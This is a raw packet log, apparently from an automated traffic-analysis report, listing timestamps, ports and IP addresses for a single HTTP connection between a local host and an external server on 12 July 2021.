Jul 12, 2021 10:28:46.345684052 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.345706940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345719099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.345741987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345765114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345792055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.345918894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345946074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345969915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345982075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346005917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346015930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346040010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346081972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346457958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346545935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346571922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346612930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346682072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346704006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346724033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346735954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346756935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346782923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346796036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346821070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346844912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346873045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346879959 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346893072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.346916914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346940994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.346963882 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.347739935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347765923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347790003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347806931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.347831011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347847939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.347865105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347887993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347908974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.347924948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347949028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347978115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.347984076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348009109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348027945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348079920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348124981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348422050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348445892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348514080 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348618984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348697901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348721027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348745108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348762989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348787069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348803997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348820925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348838091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348862886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348874092 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348896027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348906040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.348927021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348953009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348975897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.348984957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.349045038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.349591017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349616051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349641085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349668980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349675894 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.349698067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349719048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.349812984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349843025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349869013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.349879026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349904060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349925995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.349936008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349960089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349983931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.349996090 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.350054026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.350506067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350529909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350559950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350589037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350598097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.350620985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350641966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350651026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.350673914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350696087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.350706100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350729942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350749016 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.350759029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350784063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350809097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.350817919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.350868940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.351507902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351532936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351555109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351578951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351589918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.351634026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.351669073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351716995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351741076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351758957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351782084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351795912 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.351813078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351835012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.351845026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.351876974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.351996899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352071047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.352528095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352552891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352576017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352603912 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.352617979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352639914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352659941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.352673054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352695942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352720022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352725983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.352747917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352761984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.352777958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352802038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352823019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.352833033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.352876902 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.353245020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354233980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354262114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354286909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354310989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354326963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354351997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354373932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354386091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354407072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354413986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354434967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354460001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354480028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354506016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354517937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354543924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354568005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354585886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354605913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354633093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354650974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354670048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354696989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354717970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354733944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354757071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354778051 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354789019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354810953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354830980 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354839087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354860067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354878902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.354888916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.354928970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.355076075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355102062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355144978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355155945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.355176926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355197906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355218887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355227947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.355251074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355272055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.355295897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355320930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355345011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355351925 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.355374098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355389118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.355407000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.355448961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.356095076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356117964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356139898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356169939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.356194019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356240034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.356268883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356293917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356319904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356343031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356365919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.356374025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356390953 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.356404066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356431007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356456995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.356475115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356498957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.356518984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.356996059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357064009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357100964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357126951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357156038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357177019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357194901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357220888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357237101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357256889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357279062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357300043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357312918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357336998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357357979 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357372999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357418060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357714891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357831001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357856989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357882977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357893944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357923031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357940912 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.357959986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.357985020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358011007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358033895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358057976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358072042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.358077049 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.358098030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358109951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.358133078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358158112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358181000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.358664036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358689070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358711958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.358728886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358753920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358784914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.358827114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358866930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358881950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.358901978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358922958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.358962059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.359735966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.359762907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.359790087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.359800100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.359822989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.359842062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.359879971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.359921932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.359934092 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.359957933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360009909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360106945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360131979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360153913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360176086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360187054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360209942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360223055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360243082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360265970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360286951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360307932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360316992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360358000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360408068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360430002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360450983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360461950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360487938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360507965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360522032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360578060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360586882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360610962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360634089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360655069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360672951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360699892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360723019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.360738039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.360779047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.361527920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361552954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361577034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361609936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361618042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.361644030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361654043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.361677885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361700058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361725092 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.361732960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361757994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361778021 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.361797094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361819983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361839056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.361857891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361886024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.361907959 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.362262011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.362309933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.362369061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.362396002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.362420082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.362442017 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.362457991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.362495899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.362524033 CEST	80	49720	47.254.186.176	192.168.2.3
